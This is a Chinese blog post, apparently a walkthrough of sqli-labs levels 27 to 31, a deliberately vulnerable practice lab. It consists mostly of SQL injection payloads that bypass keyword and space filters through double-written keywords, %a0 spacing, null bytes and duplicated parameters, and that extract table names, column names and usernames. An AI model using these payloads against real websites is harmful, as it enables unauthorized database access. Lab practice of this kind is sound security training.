sqli-labs(6)

最新推荐文章于 2024-07-28 19:10:22 发布
最新推荐文章于 2024-07-28 19:10:22 发布
阅读量90 收藏
点赞数
分类专栏: 靶场 文章标签: 数据库 mysql sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/134658766
版权

27.

过滤了union和select 使用双写绕过

有报错信息使用报错注入

1'and(extractvalue(1,concat(0x5c,database())))and'1'='1
1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(selseselectlectect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(column_name))from(information_schema.columns)where(table_schema='security')and(table_name='users')),0x7e),1))and'1'='1

1'and(extractvalue(1,concat(0x5c,(seselselectectlect(group_concat(username))from(security.users)))))and'1'='1
1'and(updatexml(1,concat(0x7e,(seselselectectlect(group_concat(username))from(security.users)),0x7e),1))and'1'='1

这里显示不了所有的数据可以使用limit

27a.

没报错信息了

‘不能闭合尝试“发现”可以闭合

0"ununionion%a0seselselectectlect%a01,2,3%a0and"1"="1


0"ununionion%a0seselselectectlect%a01,database(),3%a0and"1"="1


0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3%a0and"1"="1

0"ununionion%a0seselselectectlect%a01,(seselselectectlect%a0group_concat(username)%a0from%a0security.users),3%a0and"1"="1

28.

不会返回报错信息无法使用报错注入

1')union%a0select%a01,2,3;%00

0')union%a0select%a01,database(),3;%00

0')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='security'),3;%00

0')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'),3;%00

0')union%a0select%a01,(select%a0group_concat(username)%a0from%a0security.users),3;%00

28a.

0')union%a0select 1,2,3;%00

0')union%a0select 1,database(),3;%00

0')union%a0select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3;%00

0')union%a0select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3;%00

0')union%a0select 1,(select group_concat(username) from security.users),3;%00

29.

题目显示会检测输入的参数是不是数字类型,在sql语句中接收相同的参数时会使用后面的值

这里传递两个id

&id=0'union select 1,database(),3 --+

&id=0'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

&id=0'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

&id=0'union select 1,(select group_concat(username) from security.users),3 --+

30.

单引号换成双引号

&id=0"union select 1,2,3 --+

&id=0"union select 1,database(),3 --+

&id=0"union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+


&id=0"union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

&id=0"union select 1,(select group_concat(username) from security.users),3 --+

31.

&id=0")union select 1,2,3 --+

多了个括号

&id=0")union select 1,database(),3--+

&id=0")union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

&id=0")union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

&id=0")union select 1,(select group_concat(username) from security.users),3--+

许允er
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs靶场搭建
AlienEowynWan的博客
11-17 287
解压放在phpstudy的WWW文件夹
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs26
qq_53030229的博客
06-01 927
文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写绕过:anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过 内联注释:/!**/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 一、审查源码 1、判断注入点和闭合方式 由于这个是与数据库交互的语句,通过这个判断
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6565
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2105
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs靶场安装
qq_44624916的博客
02-04 466
小皮phpstudy搭建sqli-labs靶场
Sqli-labs——lesson6
weixin_62281892的博客
06-29 313
lesson6
SQL注入之sqli-labs
m0_60716947的博客
04-08 7359
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
sqli-labs的搭建
qq_63233616的博客
05-04 306
1、小皮面板2、sqli-labs的下载包 下载地址:https://github.com/Audi-1/sqli-labs3、navicat。
phpStudy安装sqli-labs
CheatMyself的博客
06-16 234
更改php版本为5.*,因为这个程序只能在php 5.x上运行,在php 7及更高版本上,函数“mysql_query”和一些相关函数被删除,而不是“mysqli_query”。某些函数中的“MySQL”被替换为“MySQLi”。git地址:https://github.com/Audi-1/sqli-labs。进入网页:http://127.0.0.1/sqli-labs-master/将git下载的sqli-labs文件放进去并解压。进入sql-connections修改。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs.rar
12-22
6. 修改配置:打开`sqli-labs`文件夹中的`config.inc.php`,将数据库连接信息(如数据库名、用户名、密码)更新为实际值。 7. 访问sqli-labs:在浏览器中输入`http://localhost/sqli-labs/`,如果一切正常,你应该能...
数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 323
数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 307
用户执行,因为环境变量配置在。
已经10岁的K8S,在很多方面仍需努力
最新发布
u012516914的专栏
07-28 289
/ K8S 已经 10 岁了,但仍然有许多方面要继续努力 /Kubernetes 于 2014 年 6 月推出,自那时起,它在推广云原生应用设计和支持更多微服务部署方面发挥了巨大作用。容器部署的增长非常迅速,而 Kubernetes 对于企业管理这些部署至关重要——根据 CNCF 上一份报告的调查结果,84% 的组织正在使用或评估 Kubernetes,而 66% 的潜在和实际消费者在生产中使用 ...
SQL基础入门:解锁数据库管理的钥匙
WayneYalejk的博客
07-26 473
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
MySQL注入实战指南——Sqli-labs教程解析
- **Background-6** 讲解了服务器的两层架构,这对于理解深层的注入策略至关重要。 - **Background-7** 解释了宽字节注入,这是针对特定字符编码的注入方法。 - **Less-23 至 Less-37** 包含了更多高级攻击场景,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值